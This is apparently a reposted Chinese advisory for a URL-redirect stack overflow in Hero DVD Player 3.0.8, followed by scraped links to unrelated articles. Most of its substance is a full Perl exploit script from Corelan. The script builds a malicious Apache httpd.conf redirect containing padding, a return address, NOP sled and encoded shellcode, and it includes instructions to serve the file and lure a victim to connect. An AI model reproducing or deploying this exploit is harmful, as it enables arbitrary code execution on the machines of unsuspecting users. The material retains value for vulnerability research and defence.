豪杰DVD播放器 3.0.8 URL重新定向栈溢出漏洞
豪杰DVD播放器是一款流行的多媒体播放器。
使用豪杰DVD播放器的用户受骗跟随了恶意Web服务器上的URL重新定向就可以触发栈溢出,导致执行任意代码
测试代码:
# Exploit Title : Hero DVD Remote Buffer Overflow Exploit
# Date : July 7, 2010
# Author : chap0 [www.seek-truth.net]
# Software Link : http://download.cnet.com/Hero-DVD-Player/3000-7970_4-10127412.html
# Version : 3.0.8
# OS : Windows XP SP3
# Greetz to : God the Creator, Sud0 (Thanks Bro for the Support)
# The Crew : http://www.corelan.be:8800/index.php/security/corelan-team-members/
# Advisory : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-056
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
# Code :
print "|------------------------------------------------------------------|n";
print "| __ __ |n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |n";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |n";
print "| |n";
print "| http://www.corelan.be:8800 |n";
print "| |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[*] Hero DVD Player Remote Exploit by chap0.n";
print "[*] Visit Corelan.be port 8800, Preparing Payload . . .n";
sleep(3);
my $file = "httpd.conf";
$code = "Redirect permanent /sploit http://";
$junk = "A" x 128;
$more = "yH2X" ; # alpha value for "yH2X" = 0x58324879 from msg723.acm
$nops = "x42" x 24; #Padding
#message box code
$shell = "TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIN9JKMK9IRTWTL401N2OB2ZVQXISTLKBQ6PLKRVDLLKT65LLKPF5XLKSNWPLKWFWH0OUHRUL3PYEQ8QKOKQSPLKRLGT7TLKQUGLLK645URX5QKZLKQZ28LKPZQ0EQZKKSVW79LKGDLKEQJNVQKOP1IPKLNLK4O03DUZO1HOTM5QYWKYJQKOKOKO7K3LVD18D59NLKPZVDS1JKU6LKTLPKLK1J5L5QZKLK34LKUQKXMYQTWT5L3QHCNRTHGYN4K9KUMYIRE8LNPNTNZLPRKXMLKOKOKOMYPE5TOKSNYHKRBSMW5L14QBKXLKKOKOKOMYQUS83XBLBLGPKOSX6SP2FNE4SXRUT33U3BLHQL14UZLIJFPVKO65TDLIO20POKOXORPMOLMWEL7TPRKX1NKOKOKO3XSBSUD7V8E8BLSQRNW3U8QSRO2RCUVQ9KMXQLWT4KMYM3U82TU8687PSXWPQDRRD5RH0SRESUBK6Q9YLHPL145ZLIM1VQN2F2PSV1PRKOHPP1O060KO0UUXTJA";
open(FILE,">$file");
print FILE $code.$junk.$more.$nops.$shell;
close(FILE);
print "[*] Use Backtrack! place httpd.conf in /etc/apache2/ and start apache.n";
print "[*] Have Someone Connect to your Server /sploit.n";
TAG标签: 漏洞
本文转自 ☆★ 包罗万象网 ★☆ - http://www.baoluowanxiang.com 转载请注明出处,侵权必究!
原文链接:http://www.baoluowanxiang.com/a/net-offense/loophole/2010/0710/1174.html
豪杰DVD播放器 3.0.8 URL重新定向栈溢出漏洞相关推荐
- 五个最好的DVD播放器下载
本文向大家介绍几个最好的DVD播放器: 0F89B3D6F62C8A6244F0B380DE9DDADA 一.豪杰DVD播放器 Hero DVD Player(豪杰DVD播放器)有着增强的界面,为你提 ...
- [分享]豪杰超级DVD播放器Ⅲ破解之菜鸟了解PE文件
豪杰超级DVD播放器Ⅲ已经是个很老的播放器了,而且网上破解版的多的是,此次破解的目的并不是为了破解而破解,只是为了学习和分享,通过分析软件注册保护机制总结几种破解对策,可以说这篇破文是个纯菜鸟级的破文 ...
- Flash版(迷你音乐播放器mp3Player1.0 Beta1 )附源码
迷你音乐播放器mp3Player1.0 Beta1 ================= //What's new: 主要功能特色: 1.支持歌曲名称,歌手名称以及专辑等关键字搜索. 2.支持随机搜索 ...
- 5kplayer(高清视频播放器) V6.0
点击下载来源:5kplayer(高清视频播放器) V6.0 5kplayer是针对windows开发的一款优秀.全新的高清视频播放器软件,支持各类视频音频,DVD,电台等播放.这款高清视频播放器软件可 ...
- 迷你音乐播放器v1.0正式上线!
迷你音乐播放器V1.0正式上线! 版本介绍: 1.随机播放切换开关(通过点击专辑图片) 2.通过拖动歌曲名及艺术家名调整歌曲播放进度 3.手机浏览访问支持熄屏播放 4.暂不支持在线搜索功能 快来一起分 ...
- 1905影音播放器 v4.0.0 官方版
1905影音播放器 v4.0.0 官方版 软件大小:2.58MB 软件语言:简体中文 软件类别:影音播放 软件授权:官方版 更新时间:2015-02-14 应用平台:/Win8/Win7/WinXP ...
- win10系统专用DVD播放器安装的方法--win7w.com
win10系统性能稳定受到广大用户的喜爱,但也不尽完美,在使用过程中,难免会遇到win10系统专用DVD播放器安装的问题.碰到win10系统专用DVD播放器安装的问题.很多用户不知道win10系统专用 ...
- 小戴媒体播放器 2.0.2
小戴媒体播放器 2.0.2 是一个开源软件,全媒体,包括视频,音频,跨平台(WindowsXP/Vista/7,Ubuntu). 解压ffmpeg-3.1.5.tar到某个目录, 然后用这里的源 ...
- 秀杰音乐盒之mtv播放器 v1.0 怎么用
Welcome to my blog! <script language="javascript" src="http://avss.b15.cnwg.cn/cou ...
最新文章
- java元婴期(30)----java进阶(springmvc(4)---参数绑定(下)springmvc校验异常处理)
- 麒麟810处理器_华为nova5跑分公布,麒麟810到底是什么水平?
- 征稿 | 软件学报专刊征文:知识赋能的信息系统
- 346个基因组可视化工具一网打进!
- Oracle 11gR2 ORA-12638 身份证明检索失败解决方法
- (2)R包,GO.db调研(数据库构建角度解析)
- Java基础学习总结(70)——开发Java项目常用的工具汇总
- 华为交换机重制_华为交换机如何初始化?华为交换机初始化配置-百度经验
- 数据揭秘共享单车新局势:ofo多项行业第一
- mysql front 连接类型,MySQL-Front如何连接数据库
- Java - 为什么Java不支持运算符重载?
- C语言坐标旋转,c语言矩阵的顺、逆时针旋转
- JS初中段考:袖珍西历
- 百度网盘文件分享设置个性密码
- 什么是归一化,它与标准化的区别是什么?
- 奶茶和咖啡,二者终有一战
- java map tostring_Map转为String
- 利用绝对值函数以及三目运算符简便打印菱形字母塔
- IDEA运行报Command line is too long和unable to find valid certification path to requested target
- 或是独体字吗_北是独体字吗?
热门文章
- 禁止移动端微信内置浏览器调节字体大小
- oracle编程题考试题,oracle考试题
- MSP432E401Y-用定时器中断控制LED闪烁
- 【LeetCode】P70 爬楼梯
- android 自定义园动画,Android 自定View实现仿QQ运动步数圆弧及动画效果
- 12306抢票(1)主体部分
- Web前端面试常用技巧
- Unable to get offset lags for kafka. Reason: java.lang.NullPointerException at org.apache.storm.kafk
- mysql 分组查询最新
- 云班课python答案_云班课 答案 脚本